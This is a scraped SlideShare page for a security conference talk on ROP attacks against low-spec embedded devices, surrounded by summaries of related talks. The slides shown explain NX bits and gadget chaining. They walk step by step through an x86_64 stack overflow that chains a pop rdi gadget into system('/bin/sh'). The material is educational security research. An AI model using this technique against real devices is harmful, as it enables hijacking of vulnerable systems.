Yuuma Taki is enrolled in the Hokkaido Information University Information Media Faculty of Information Media (4th year).
At university he is focusing on learning about security for lower-level components, such OS and CPU. In his third year of undergraduate school, he worked on trying to implement the OS security mechanism "KASLR", at Sechack365.
Currently, he is learning about ROP derivative technology and embedded equipment security.
Report
Share
Report
Share
1 of 43
Download to read offline
More Related Content
Similar to [cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-spec embedded devices- by Yuuma Taki
ARM Ltd designs ARM processor cores and licenses them to partners. It also develops software and peripherals to assist with implementing the ARM architecture. The document discusses ARM's business model, processor modes, register organization, instruction sets, conditional execution, and branch instructions of the ARM architecture. It provides an overview of the key components and evolution of the ARM architecture.
Introduction in Security given by Bart Van Bos at Nalys.
Topics:
- Buffer overflows in C
- Counter measures
- Life demo of 2 attacks
- Shellcode generation
This document discusses techniques for abusing the Intel paging mechanism on Windows to achieve arbitrary write capabilities despite modern kernel protections. It describes how the HAL's heap can be accessed from user mode by modifying page table entries, allowing kernel pointers to be leaked. It also explains how spraying process memory with fake page directories can cause physical memory exhaustion and potentially lead to arbitrary writes if a sprayed page is mapped. Live demos are promised for Windows and Linux attacks.
The CPU, or processor, carries out the instructions of a computer program and is the primary component responsible for a computer's functions. As microelectronic technology advanced, more transistors were placed on integrated circuits, decreasing the number of chips needed for a complete CPU. Processor registers provide the fastest way for a CPU to access data and are located at the top of the memory hierarchy. Common processor architectures include the ARM architecture which has influenced the design of many CPUs due to its low power consumption and flexibility.
The document discusses the ARM architecture and interrupt handling. It provides background on ARM and compares RISC and CISC architectures. It describes ARM's instruction sets, data sizes, registers including the program counter and current program status register. It discusses exception handling in ARM, including saving state on exception entry and exit. Interrupts and exceptions are compared to system calls. Memory organization during exceptions is also covered.
We show that it is possible to write remote stack buffer overflow exploits without possessing a copy of the target binary or source code, against services that restart after a crash. This makes it possible to hack proprietary closed-binary services, or open-source servers manually compiled and installed from source where the binary remains unknown to the attacker. Traditional techniques are usually paired against a particular binary and distribution where the hacker knows the location of useful gadgets for Return Oriented Programming (ROP). Our Blind ROP (BROP) attack instead remotely finds enough ROP gadgets to perform a write system call and transfers the vulnerable binary over the network, after which an exploit can be completed using known techniques. This is accomplished by leaking a single bit of information based on whether a process crashed or not when given a particular input string. BROP requires a stack vulnerability and a service that restarts after a crash. The attack works against modern 64-bit Linux with address space layout randomization (ASLR), no-execute page protection (NX) and stack canaries.
The document discusses bypassing address space layout randomization (ASLR) on Linux. It begins with a refresher on buffer overflows and modern protections like ASLR and DEP. It then explores finding fixed addresses in the .text section that are not subject to ASLR to redirect execution, such as calls and jumps to registers. The document shows searching binaries for these instruction sequences and checking register values to leverage them for exploiting a vulnerable program while ASLR is enabled.
OSPFv2 is a link-state routing protocol that runs on IP and uses protocol number 89. It supports areas, authentication, and route redistribution. On IOS-XR, OSPFv2 uses a hierarchical CLI with inheritance and multiple threads to handle different tasks like packet processing, route installation, and neighbor synchronization. Key differences between IOS and IOS-XR include the use of inheritance and the hierarchical organization of OSPFv2 configuration.
The document discusses various techniques for deception and bypassing security checks, including:
1) Using iptables and the TARPIT and DELUDE targets to deceive port scanners by simulating open ports or terminating connections.
2) Writing x64 shellcode and understanding differences from x86 in CPU registers and the kernel ABI.
3) Performing DL-injection attacks by injecting a dynamic library to override functions like getuid() and bypass authentication.
4) Demonstrating process hijacking using ptrace() to inject shellcode and escalate privileges.
5) Mounting a local privilege escalation attack after gaining initial user access.
ARM (Advance RISC Machine) is one of the most licensed and thus widespread processor cores in the world.Used especially in portable devices due to low power consumption and reasonable performance.Several interesting extension available like THUMB instruction set and Jazelle Java Machine.
This document provides an overview of the ARM processor architecture. It discusses key aspects of ARM including:
- ARM's RISC load/store architecture with fixed-length 32-bit instructions.
- Its pipeline structure which breaks instructions into stages to allow for parallel execution.
- Operating modes like user, system, fast interrupt, and interrupt request that determine privileges.
- Support for exceptions and interrupts.
- Instruction sets including the main 32-bit ARM set and compressed 16-bit Thumb set.
- Popular ARM processor families and cores like ARM7, ARM9, ARM11, Cortex-A, Cortex-M, and features between versions.
The OpenCSD library for decoding CoreSight traces has reached the point where it is ready to be integrated into applications. This session will present an overview of the state of the library, its interfaces and explore and demonstrate a sample integration with perf.
Controlling PC on ARM using Fault InjectionRiscure
The slides from the presentation by Riscure's Niek Timmers, Albert Spruyt and Marc Whitteman. The paper describes an ARM specific fault injection attack strategy for exploiting embedded systems where externally controlled data is loaded in the program counter (PC) register of the processor.
ARM Ltd designs ARM processor cores and licenses them to semiconductor companies. It also develops software and hardware tools to support the ARM architecture. The document discusses ARM's business model, the ARM programmer's model including instruction sets, register sets, processor modes and exception handling, and how various ARM instructions work.
eBPF has 64-bit general purpose registers, therefore 32-bit architectures normally need to use register pair to model them and need to generate extra instructions to manipulate the high 32-bit in the pair. Some of these overheads incurred could be eliminated if JIT compiler knows only the low 32-bit of a register is interested. This could be known through data flow (DF) analysis techniques. Either the classic iterative DF analysis or "path-sensitive" version based on verifier's code path walker.
In this talk, implementations for both versions of DF analyzer will be presented. We will see how a def-use chain based classic eBPF DF analyser looks first, and will see the possibility to integrate it with previous proposed eBPF control flow graph framework to make a stand-alone eBPF global DF analyser which could potentially serve as a library. Then, another "path-sensitive" DF analyser based on the existing verifier code path walker will be presented. We will discuss how function calls, path prune, path switch affect the implementation. Finally, we will summarize pros and cons for each, and will see how could each of them be adapted to 64-bit and 32-bit architecture back-ends.
Also, eBPF has 32-bit sub-register and ALU32 instructions associated, enable them (-mattr=+alu32) in LLVM code-gen could let the generated eBPF sequences carry more 32-bit information which could potentially easy flow analyser. This will be briefly discussed in the talk as well.
1. Embedded C requires compilers to create files that can be downloaded and run on microcontrollers, while C compilers typically generate OS-dependent executables for desktop computers.
2. Embedded systems often have real-time constraints and limited memory/power that are usually not concerns for desktop applications.
3. Programming for embedded systems requires optimally using limited resources and satisfying real-time constraints, which is done using the basic C syntax and function libraries but with an embedded/hardware-oriented mindset.
The document provides an introduction and overview of ARM processors. It discusses the background and architecture of ARM, including that ARM is a RISC processor designed for efficiency. It also describes some key features of ARM including Thumb mode, different memory banks, and specialized instructions. The document then discusses ARM concepts such as the ARM instruction set and assembly language programming.
ARM Ltd designs ARM processor cores and licenses them to semiconductor companies. It also develops software and hardware tools to support the ARM architecture. The ARM architecture uses 32-bit RISC instructions and has 7 processor modes. It supports conditional execution, uses a barrel shifter as part of data processing instructions, and provides various branch instructions for flow control.
Originally conceived as a processor for desktop systems, ARM processors are now widely used in embedded applications and markets. Some significant products that used ARM processors include the Apple Newton PDA (ARM6 core), Apple iPod (ARM7 core), and Apple iPhone and Nokia N93/N100 (ARM11 core). ARM processors are based on reduced instruction set computer (RISC) architecture. They are designed for low power consumption applications like mobile devices. Some key features of ARM processors include 32-bit instruction set with 16-bit Thumb extension, unified memory address space, and relatively low power consumption.
Smash the Stack: Writing a Buffer Overflow Exploit (Win32)Elvin Gentiles
This document provides an overview of buffer overflow exploits on Windows 32-bit systems. It discusses the lab environment that will be used, basic assembly concepts like registers and instructions, the Windows 32 memory layout, how the stack works, and the general steps for exploit development. These include causing a crash, identifying the offset, determining bad characters, locating space for shellcode, generating shellcode, and redirecting execution to the shellcode. The document concludes by listing some hands-on exercises that will be covered, and recommending additional learning materials on exploit writing.
Similar to [cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-spec embedded devices- by Yuuma Taki (20)
[cb22] Hayabusa Threat Hunting and Fast Forensics in Windows environments fo...CODE BLUE
It started with computer hacking and Japanese linguistics as a kid. Zach Mathis has been based in Kobe, Japan, and has performed both red team services as well as blue team incident response and defense consultation for major Japanese global Japanese corporations since 2006. He is the founder of Yamato Security, one of the largest and most popular hands-on security communities in Japan, and has been providing free training since 2012 to help improve the local security community. Since 2016, he has been teaching security for the SANS institute and holds numerous GIAC certifications. Currently, he is working with other Yamato security members to provide free and open-source security tools to help security analysts with their work.
[cb22] Tales of 5G hacking by Karsten NohlCODE BLUE
An expert in mobile network security provided a summary of hacking 5G networks. Some key points include:
1) Standard IT security techniques uncovered issues when applied to upgraded legacy 4G networks, such as unpatched operating systems, weak configurations, and lack of encryption.
2) Future 5G networks introduce new security risks due to increased complexity from virtualization and automation layers, as well as a continuously evolving attack surface extending into cloud infrastructure.
3) Red team exercises show that hacking mobile networks has become a multi-step process, where initial access through one vulnerability can enable lateral movement and privilege escalation to compromise critical systems or customer data.
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...CODE BLUE
Printer has become one of the essential devices in the corporate intranet for the past few years, and its functionalities have also increased significantly. Not only print or fax, cloud printing services like AirPrint are also being supported as well to make it easier to use. Direct printing from mobile devices is now a basic requirement in the IoT era. We also use it to print some internal business documents of the company, which makes it even more important to keep the printer safe.
Nowadays, most of the printers on the market do not have to be connected with USB or traditional cable. As long as you are using a LAN cable connected to the intranet, the computer can find and use the printer immediately. Most of them are based on protocols such as SLP and LLMNR. But is it really safe when vendors adopt those protocols? Furthermore, many printers do not use traditional Linux systems, but use RTOS(Real-Time Operating System) instead, how will this affect the attacker?
In this talk, we will use Canon ImageCLASS MF644Cdw and HP Color LaserJet Pro MFP M283fdw as case study, showing how to analyze and gain control access to the printer. We will also demonstrate how to use the vulnerabilities to achieve RCE in RTOS in unauthenticated situations.
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...CODE BLUE
While hackers have known the importance of sharing research to improve security for years, the importance of coordinated vulnerability disclosure is increasingly recognized by governments around the world. The principals of disclosure an protecting security researchers are common across borders, but different countries have some key differences. This panel will present a global perspective that may in turn inform key public policy and company behavior.
ENISA has published 'Coordinated Vulnerability Disclosure policies in the EU' in April 2022 . This report not only provides an objective introduction to the current state of coordinated vulnerability disclosure policies in the Member States of the European Union, but also introduces the operation of vulnerability disclosure in China, Japan and the USA. Based on these findings, the desirable and good practice elements of a coordinated vulnerability disclosure process are examined, followed by a discussion of the challenges and issues.
This session aims to share the contents of this report and clarify the challenges and future direction of operations in Japan, as well as national security and vulnerability handling issues in the US, in a panel discussion with representatives from various jurisdictions.
The panelists are involved in the practice of early warning partnership notified bodies in Japan, the authors of the above report in Europe and the contributors to the above report in the US.
In Japan, the issues of system awareness, incentives, increase in the number of outstanding cases in handling and so-called triage in handling vulnerabilities will be introduced.
From the United States, the Vulnerabilities Equities Process for National Security and the publication of a non-prosecution policy for vulnerability research will be introduced, as well as a historical background on the issue.
The aim is that the panel discussion will enable the audience to understand the international situation surrounding CVD, as well as future trends, in particular the important role of vulnerability in cybersecurity and the challenges faced by society around it.
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...CODE BLUE
While hackers have known the importance of sharing research to improve security for years, the importance of coordinated vulnerability disclosure is increasingly recognized by governments around the world. The principals of disclosure an protecting security researchers are common across borders, but different countries have some key differences. This panel will present a global perspective that may in turn inform key public policy and company behavior.
ENISA has published 'Coordinated Vulnerability Disclosure policies in the EU' in April 2022 . This report not only provides an objective introduction to the current state of coordinated vulnerability disclosure policies in the Member States of the European Union, but also introduces the operation of vulnerability disclosure in China, Japan and the USA. Based on these findings, the desirable and good practice elements of a coordinated vulnerability disclosure process are examined, followed by a discussion of the challenges and issues.
This session aims to share the contents of this report and clarify the challenges and future direction of operations in Japan, as well as national security and vulnerability handling issues in the US, in a panel discussion with representatives from various jurisdictions.
The panelists are involved in the practice of early warning partnership notified bodies in Japan, the authors of the above report in Europe and the contributors to the above report in the US.
In Japan, the issues of system awareness, incentives, increase in the number of outstanding cases in handling and so-called triage in handling vulnerabilities will be introduced.
From the United States, the Vulnerabilities Equities Process for National Security and the publication of a non-prosecution policy for vulnerability research will be introduced, as well as a historical background on the issue.
[cb22] ”The Present and Future of Coordinated Vulnerability Disclosure” Inte...CODE BLUE
While hackers have known the importance of sharing research to improve security for years, the importance of coordinated vulnerability disclosure is increasingly recognized by governments around the world. The principals of disclosure an protecting security researchers are common across borders, but different countries have some key differences. This panel will present a global perspective that may in turn inform key public policy and company behavior.
ENISA has published 'Coordinated Vulnerability Disclosure policies in the EU' in April 2022 . This report not only provides an objective introduction to the current state of coordinated vulnerability disclosure policies in the Member States of the European Union, but also introduces the operation of vulnerability disclosure in China, Japan and the USA. Based on these findings, the desirable and good practice elements of a coordinated vulnerability disclosure process are examined, followed by a discussion of the challenges and issues.
This session aims to share the contents of this report and clarify the challenges and future direction of operations in Japan, as well as national security and vulnerability handling issues in the US, in a panel discussion with representatives from various jurisdictions.
The panelists are involved in the practice of early warning partnership notified bodies in Japan, the authors of the above report in Europe and the contributors to the above report in the US.
In Japan, the issues of system awareness, incentives, increase in the number of outstanding cases in handling and so-called triage in handling vulnerabilities will be introduced.
From the United States, the Vulnerabilities Equities Process for National Security and the publication of a non-prosecution policy for vulnerability research will be introduced, as well as a historical background on the issue.
The aim is that the panel discussion will enable the audience to understand the international situation surrounding CVD, as well as future trends, in particular the important role of vulnerability in cybersecurity and the challenges faced by society around it.
[cb22] "The Present and Future of Coordinated Vulnerability Disclosure" Inter...CODE BLUE
While hackers have known the importance of sharing research to improve security for years, the importance of coordinated vulnerability disclosure is increasingly recognized by governments around the world. The principals of disclosure an protecting security researchers are common across borders, but different countries have some key differences. This panel will present a global perspective that may in turn inform key public policy and company behavior.
ENISA has published 'Coordinated Vulnerability Disclosure policies in the EU' in April 2022 . This report not only provides an objective introduction to the current state of coordinated vulnerability disclosure policies in the Member States of the European Union, but also introduces the operation of vulnerability disclosure in China, Japan and the USA. Based on these findings, the desirable and good practice elements of a coordinated vulnerability disclosure process are examined, followed by a discussion of the challenges and issues.
This session aims to share the contents of this report and clarify the challenges and future direction of operations in Japan, as well as national security and vulnerability handling issues in the US, in a panel discussion with representatives from various jurisdictions.
The panelists are involved in the practice of early warning partnership notified bodies in Japan, the authors of the above report in Europe and the contributors to the above report in the US.
In Japan, the issues of system awareness, incentives, increase in the number of outstanding cases in handling and so-called triage in handling vulnerabilities will be introduced.
From the United States, the Vulnerabilities Equities Process for National Security and the publication of a non-prosecution policy for vulnerability research will be introduced, as well as a historical background on the issue.
The aim is that the panel discussion will enable the audience to understand the international situation surrounding CVD, as well as future trends, in particular the important role of vulnerability in cybersecurity and the challenges faced by society around it.
[cb22] Under the hood of Wslink’s multilayered virtual machine en by Vladisla...CODE BLUE
In October 2021, we published the first analysis of Wslink – a unique loader likely linked to the Lazarus group. Most samples are packed and protected with an advanced virtual machine (VM) obfuscator; the samples contain no clear artifacts and we initially did not associate the obfuscation with a publicly known VM, but we later managed to connect it to CodeVirtualizer. This VM introduces several additional obfuscation techniques such as insertion of junk code, encoding of virtual operands, duplication of virtual opcodes, opaque predicates, merging of virtual instructions, and a nested VM.
Our presentation analyzes the internals of the VM and describes our semi automated approach to “see through” the obfuscation techniques in reasonable time. We demonstrate the approach on some bytecode from a protected sample and compare the results with a non-obfuscated sample, found subsequent to starting our analysis, confirming the method’s validity. Our solution is based on a known deobfuscation method that extracts the semantics of the virtual opcodes, using symbolic execution with simplifying rules. We further treat the bytecode chunks and some internal constructs of the VM as concrete values instead of as symbolic ones, enabling the known deobfuscation method to deal with the additional obfuscation techniques automatically.
[cb22] CloudDragon’s Credential Factory is Powering Up Its Espionage Activiti...CODE BLUE
Kimsuky is a North Korean APT possibly controlled by North Korea's Reconnaissance General Bureau. Based on reports from the Korea Internet & Security Agency (KISA) and other vendors, TeamT5 identified that Kimsuky's most active group, CloudDragon, built a workflow functioning as a "Credential Factory," collecting and exploiting these massive credentials.
The credential factory powers CloudDragon to start its espionage campaigns. CloudDragon's campaigns have aligned with DPRK's interests, targeting the organizations and key figures playing a role in the DPRK relationship. Our database suggested that CloudDragon has possibly infiltrated targets in South Korea, Japan, and the United States. Victims include think tanks, NGOs, media agencies, educational institutes, and many individuals.
CloudDragon's "Credential Factory" can be divided into three small cycles, "Daily Cycle," "Campaign Cycle," and "Post-exploit Cycle." The"Daily Cycle" can collect massive credentials and use the stolen credentials to accelerate its APT life cycle.
In the "Campaign Cycle," CloudDragon develops many new malware. While we responded to CloudDragon's incidents, we found that the actor still relied on BabyShark malware. CloudDragon once used BabyShark to deploy a new browser extension malware targeting victims' browsers. Moreover, CloudDragon is also developing a shellcode-based malware, Dust.
In the "Post-exploit Cycle," the actor relied on hacking tools rather than malicious backdoors. We also identified that the actor used remote desktop software to prevent detection.
In this presentation, we will go through some of the most significant operations conducted by CloudDragon, and more importantly, we will provide possible scenarios of future invasions for defense and detection.
[cb22] From Parroting to Echoing: The Evolution of China’s Bots-Driven Info...CODE BLUE
Social media is no doubt a critical battlefield for threat actors to launch InfoOps, especially in a critical moment such as wartime or the election season. We have seen Bot-Driven Information Operations (InfoOps, aka influence campaign) have attempted to spread disinformation, incite protests in the physical world, and doxxing against journalists.
China's Bots-Driven InfoOps, despite operating on a massive scale, are often considered to have low impact and very little organic engagement. In this talk, we will share our observations on these persistent Bots-Driven InfoOps and dissect their harmful disinformation campaigns circulated in cyberspace.
In the past, most bots-driven operations simply parroted narratives of the Chinese propaganda machine, mechanically disseminating the same propaganda and disinformation artifacts made by Chinese state media. However, recently, we saw the newly created bots turn to post artifacts in a livelier manner. They utilized various tactics, including reposting screenshots of forum posts and disguised as members of “Milk Tea Alliance,” to create a false appearance that such content is being echoed across cyberspace.
We particularly focus on an ongoing China's bots-driven InfoOps targeting Taiwan, which we dub "Operation ChinaRoot." Starting in mid-2021, the bots have been disseminating manipulated information about Taiwan's local politics and Covid-19 measures. Our further investigation has also identified the linkage between Operation ChinaRoot and other Chinese state-linked networks such as DRAGONBRIDGE and Spamouflage.
[cb22] Who is the Mal-Gopher? - Implementation and Evaluation of “gimpfuzzy”...CODE BLUE
Malwares written in Go is increasing every year. Go's cross-platform nature makes it an opportune language for attackers who wish to target multiple platforms. On the other hand, the statically linked libraries make it difficult to distinguish between user functions and libraries, making it difficult for analysts to analyze. This situation has increased the demand for Go malware classification and exploration.
In this talk, we will demonstrate the feasibility of computing similarity and classification of Go malware using a newly proposed method called gimpfuzzy. We have implemented "gimpfuzzy", which incorporates Fuzzy Hashing into the existing gimphash method. In this talk, we will verify the discrimination rate of the classification using the proposed method and confirm the validity of the proposed method by discussing some examples from the classified results. We will also discuss issues in Go-malware classification.
[cb22] Tracking the Entire Iceberg - Long-term APT Malware C2 Protocol Emulat...CODE BLUE
This document discusses the results of long-term scanning and analysis of Winnti 4.0 and ShadowPad malware command and control (C2) protocols. It finds that Winnti 4.0 C2s primarily use TLS, HTTPS, and HTTP, while ShadowPad variants primarily use TCP, HTTPS, and HTTP. Analysis of the protocols reveals encryption methods, packet structures, and server-side functionality. Over time, the number and distribution of active C2s changed, likely in response to research publications and incident response actions. The document advocates for anonymization techniques and merits and risks of future research publications.
[cb22] Fight Against Malware Development Life Cycle by Shusei Tomonaga and Yu...CODE BLUE
We are swamped with new types of malware every day. The goal of malware analysis is not to reveal every single detail of the malware. It is more important to develop tools for efficiency or introduce automation to avoid repeating the same analysis process. Therefore, malware analysts usually actively develop tools and build analysis systems. On the other hand, it costs a lot for such tool developments and system maintenance. Incident trends change daily, and malware keeps evolving. However, it is not easy to keep up with new threats. Malware analysts spend a long time maintaining their analysis systems, and it results in reducing their time for necessary analysis of new types of malware.
To solve these problems, we incorporate DevOps practices into malware analysis to reduce the cost of system maintenance by using CI/CD and Serverless. This presentation shares our experience on how CI/CD, Serverless, and other cloud technologies can be used to streamline malware analysis. Specifically, the following case studies are discussed.
* Malware C2 Monitoring
* Malware Hunting using Cloud
* YARA CI/CD system
* Malware Analysis System on Cloud
* Memory Forensic on Cloud
Through the above case studies, we will share the benefits and tips of using the cloud and show how to build a similar system using Infrastructure as Code (IaC). The audience will learn how to improve the efficiency of malware analysis and build a malware analysis system using Cloud infrastructure.
[cb22] What I learned from the direct confrontation with the adversaries who ...CODE BLUE
In November 2019, I started monitoring the Bitcoin operation by the adversaries who hid IP addresses of their C&C server in the blockchain. In June 2020, I started collaborating with Professor Christian Doerr of the Hasso Plattner Institute based on the idea of redirecting C&C server communication to a sinkhole server (called takeover), and we successfully achieved this in August. However, the adversaries quickly took evasive action, where they managed to implement an evasion mechanism in only two weeks and restarted their attack. Although we could not conduct our takeover, our monitoring system could worked well. The end of their attack was brought upon by the surge in Bitcoin prices. Due to the fees for the Bitcoin miners, a transaction had reduced the adversaries' profits, and we confirmed the last C&C update was in January 2021 and the abandonment of the attack infrastructure came in March. Since then, no similar attacks have been observed by my monitoring system.
Although this attack has already concluded and is unlikely to restart unless the value of Bitcoin declines, I would like to share the know-how I have learned through the direct confrontation with the adversaries. That is, at the time of the confrontation with them, this attack was highly novel, and the adversaries themselves did not fully understand the best solution for its' operation. They needed to evolve their tactics, techniques, and procedures (TTPs) while operating the system. We carefully analyzed their TTPs and tried to catch them off their guard. Even more troublesome was the need to understand as quickly as possible what they intended to do each time they were affected by the Bitcoin halving or making a simple operational error. This presentation is a culmination my insights learned from interactions with these adversaries and I am looking forward to sharing this information with everyone.
A study on drug utilization evaluation of bronchodilators using DDD methodDr. Chihiro
The abstract was published as a conference proceeding in a Newsletter after being presented as an e-posture and secured 2nd prize during the scientific proceedings of "National Conference on Health Economics and Outcomes Research (HEOR) to Enhance Decision Making for Global Health" held at Raghavendra Institute of Pharmaceutical Education and Research (RIPER)- Autonomous in association with the International Society for Pharmacoeconomics and Outcomes Research (ISPOR)-India Andhra Pradesh Regional Chapter during 4th& 5th August 2023.
Nasir A. A study on drug utilization evaluation of bronchodilators using the DDD method. RIPER - PDIC Bulletin ISPOR India Andhra Pradesh Regional Chapter Newsletter [Internet]. 2023 Sep;11(51):14. Available from: www.riper.ac.in
Destyney Duhon personal brand explorationminxxmaree
Destyney Duhon embodies a singular blend of creativity, resilience, and purpose that defines modern entrepreneurial spirit. As a visionary at the intersection of artistry and innovation, Destyney fearlessly navigates uncharted waters, sculpting her journey with a profound commitment to authenticity and impact.This Brand exploration power point is a great example of her dedication to her craft.
stackconf 2024 | Using European Open Source to build a Sovereign Multi-Cloud ...NETWAYS
The European Commission has clearly identified open source as a strategic tool for bringing some balance to an EU cloud market currently dominated by a handful of non-EU hyperscalers. Part of that commitment comes through a series of ambitious, multi-million EU projects like the SIMPL platform for Data Spaces and the multi-country “Important Project of Common European Interest on Next Generation Cloud Infrastructure and Services” (IPCEI-CIS). For the first time in the history of the European Union, it is the EU industry who will be leading large-scale open source projects aimed at building European strategic technologies. In this talk we will explain in detail how specific European open source technologies are being brought together as part of some of those projects to start building Sovereign Multi-Cloud solutions that ensure interoperability and digital sovereignty for European users while preventing vendor lock-in in the cloud market, opening up competition in the emerging 5G/edge.
Call India AmanTel allows you to call from any country in the world including India to the USA and Canada at the cheapest rate Limited offers new users some free minutes.
stackconf 2024 | On-Prem is the new Black by AJ JesterNETWAYS
In a world where Cloud gives us the ease and flexibility to deploy and scale your apps we often overlook security and control. The fact that resources in the cloud are still shared, the hardware is shared, the network is shared, there is not much insight into the infrastructure unless the logs are exposed by the cloud provider. Even an air gap environment in the cloud is truly not air gapped, it’s a pseudo-private network. Moreover, the general trend in the industry is shifting towards cloud repatriation, it’s a fancy term for bringing your apps and services from cloud back to on-prem, like old school how things were run before the cloud was even a thing. This shift has caused what I call a knowledge gap where engineers are only familiar with interacting with infrastructure via APIs but not the hardware or networks their application runs on. In this talk I aim to demystify on-prem environments and more importantly show engineers how easy and smooth it is to repatriate data from cloud to an on-prem air gap environment.
stackconf 2024 | Buzzing across the eBPF Landscape and into the Hive by Bill ...NETWAYS
The buzz around the Linux kernel technology eBPF is growing quickly and it can be hard to know where to start or how to keep up with this technology that is reshaping our infrastructure stack. In this talk, Bill will trace how he got into eBPF, explore some of the applications leveraging eBPF today, and teach others how to dive into the hive of activity around eBPF. People just beginning with eBPF will learn how eBPF makes it possible to have efficient networking, observability without instrumentation, effortless tracing, and real-time security (among other things) without needing your own kernel team. Those already familiar with eBPF will get an overview of the eBPF landscape and learn about many new and expanding eBPF applications that allow them to harness the power without needing to dive into the bytecode. The audience will walk away with an understanding of the buzz around eBPF and knowledge of new tools that may solve some of their problems in networking, observability, and security.
Risks & Business Risks Reduce - investment.pdfHome
In this presentation, I have shown major risks that are to face in a business investment. Also I have shown their classification and sources.
This information have taken from my text book -" Investment Analysis and Portfolio Management ~chapter 2 Investment~ " For complete this Presentation I used Figma and Canva.
My Role:
a. Student Final year - Accounting
b. Presentation Designer
[cb22] Are Embedded Devices Ready for ROP Attacks? -ROP verification for low-spec embedded devices- by Yuuma Taki
1. Are Embedded Devices Ready for ROP Attacks?
-ROP verification for low-spec embedded devices. -
YUUMA TAKI
1
2. Self introduction
Yuuma Taki
・Hokkaido Information University
Department of Information Media A Senior
・Interested in lower layer security around OS and CPU.
Having Researched KASLR deployment
using Prekern at SecHack365.
A Japanese security Hackathon
2
3. Overview
・Investigate possibilities of ROP attacks against OSs and processors
for embedded systems.
→ Execute vulnerable test programs on embedded system,
launch ROP Attack(details later).
→Emulate both high spec and low spec embedded devices
using QEMU.
3
4. Background
・Radically Increase demand for embedded systems
by proliferation of IoT devices.
→ Due to various restrictions in some embedded devices, cannot deploy
rich security systems. ・Low Power
・Small Capacity
・Low Electricity
Consumption
・High Power
・Large Capacity
・High Electricity
Consumption
4
5. Background
・Evolution of Return Oriented Programming(ROP) Attacks
→ROP attack is an attack combining code execution snippets
inside a program to perform arbitrary processing.
→Derivative techniques of ROP attacks are being researched.
・ROP attacks can be utilized to various architectures.
5
6. Previous Research
A ROP countermeasure:
Implementing security controls such as Control-Flow Integrity
Drawback:
High cost to execute the security controls.
→Implementing security control in low-spec embedded devices is difficult.
6
7. This Research
・Investigate embedded devices that have no ROP countermeasures.
・Devising a new countermeasures which can be implemented to
low spec embedded devices
7
8. ROP Overview
・What is ROP(Return Oriented Programming) ?
→Attack method devised to circumvent Nxbit security control.
・No eXecutable bit (NX bit)
→ Security control that disables code execution of code set
in the heap or stack region.
This can hinder shell code execution
by exploiting stack overflow vulnerabilities.
8
9. Visualizing ROP
・ROP Attack
→Trigger code execution by chaining code fragments called gadgets
into a ROP chain.
Command fragment 1
Command fragment 2
Command fragment 3
Command fragment 4
Command fragment 5
Command fragment 6
Ordinary Execution File
Command
Fragment 1
Command
Fragment 3
Command
Fragment 5
Command
Fragment 6
ROP Chain
Collect command
fragments needed
for attack
Code Region
Data Region
Execution File
ROP Chain
Embed into
ROP Chain
9
10. ROP on x86_64
・Execute system(/bin/sh) to steal control
Assembly Command Used
pop xxx: Contain rsp value into xxx register
ret: Same value for pop rip
0x400100: pop rdi
0x400102: ret
:
0x400200: pop rsi
0x400202: ret
:
0x400300: pop rdx
0x400302: ret
:
Assembly Code
buf (0x10)
rbp
rsp
saved rbp
Return Address
rbp + 8
・
・
・
Stack Region Register
rdi: Store parameter 1
rsi: Store parameter 2
rdx: Store parameter 3
rip: Store next address for
execution
rbp: Store lowest address
inside the stack frame
rsp: Store stack top
address
10
11. ・Write ROP chain by filling up to the return address with ‘A’
ROP on x86_64
Assembly Command Used
pop xxx: Contain rsp value into xxx register
ret: Same value for pop rip
11
0x400100: pop rdi
0x400102: ret
:
0x400200: pop rsi
0x400202: ret
:
0x400300: pop rdx
0x400302: ret
:
Assembly Code
buf (0x10)
rbp
rsp
saved rbp
Return Address
rbp + 8
・
・
・
Stack Region Register
rdi: Store parameter 1
rsi: Store parameter 2
rdx: Store parameter 3
rip: Store next address for
execution
rbp: Store lowest address
inside the stack frame
rsp: Store stack top
address
12. ROP on x86_64
AAAAAAAA
AAAAAAAA
rsp
AAAAAAAA
0x400100
“/bin/sh” Address
‘system’
actual address
・After embedding ROP Chain
Assembly Command Used
pop xxx: Contain rsp value into xxx register
ret: Same value for pop rip
12
0x400100: pop rdi
0x400102: ret
:
0x400200: pop rsi
0x400202: ret
:
0x400300: pop rdx
0x400302: ret
:
Assembly Code Stack Region Register
rdi: Store parameter 1
rsi: Store parameter 2
rdx: Store parameter 3
rip: Store next address for
execution
rbp: Store lowest address
inside the stack frame
rsp: Store stack top
address
13. ROP on x86_64
AAAAAAAA
AAAAAAAA
rsp
AAAAAAAA
0x400100
“/bin/sh” Address
‘system’
actual address
Assembly Command Used
pop xxx: Contain rsp value into xxx register
ret: Same value for pop rip
13
0x400100: pop rdi
0x400102: ret
:
0x400200: pop rsi
0x400202: ret
:
0x400300: pop rdx
0x400302: ret
:
Assembly Code Stack Region Register
rdi: Store parameter 1
rsi: Store parameter 2
rdx: Store parameter 3
rip: 0x400100
rbp:0x4141414141414141
rsp: Store stack top
address
・Right after processing functions (pop rbp; ret;)
14. ROP on x86_64
Stack top
“/bin/sh” address
gets stored into
rdi at pop rdi
execution
・pop rdi execution time
Assembly Command Used
pop xxx: Contain rsp value into xxx register
ret: Same value for pop rip
14
0x400100: pop rdi
0x400102: ret
:
0x400200: pop rsi
0x400202: ret
:
0x400300: pop rdx
0x400302: ret
:
Assembly Code Stack Region
AAAAAAAA
AAAAAAAA
rsp
AAAAAAAA
0x400100
“/bin/sh” Address
‘system’
actual address
Register
rdi: “/bin/sh” address
rsi: Store parameter 2
rdx: Store parameter 3
rip: 0x400102
rbp:0x4141414141414141
rsp: Store stack top
address
15. ROP on x86_64
By ret command
the ‘system’ actual
address gets stored
in rip
・ret execution time
Assembly Command Used
pop xxx: Contain rsp value into xxx register
ret: Same value for pop rip
15
0x400100: pop rdi
0x400102: ret
:
0x400200: pop rsi
0x400202: ret
:
0x400300: pop rdx
0x400302: ret
:
Assembly Code Stack Region
AAAAAAAA
AAAAAAAA
rsp
AAAAAAAA
0x400100
“/bin/sh” Address
‘system’
actual address
Register
rdi: “/bin/sh” address
rsi: Store parameter 2
rdx: Store parameter 3
rip: ‘system’ actual address
rbp:0x4141414141414141
rsp: Store stack top
address
16. Effective Security Countermeasures
against ROP①
Address Space Layer Randomization(ASLR):
ASLR is a security measurement that randomize the address space
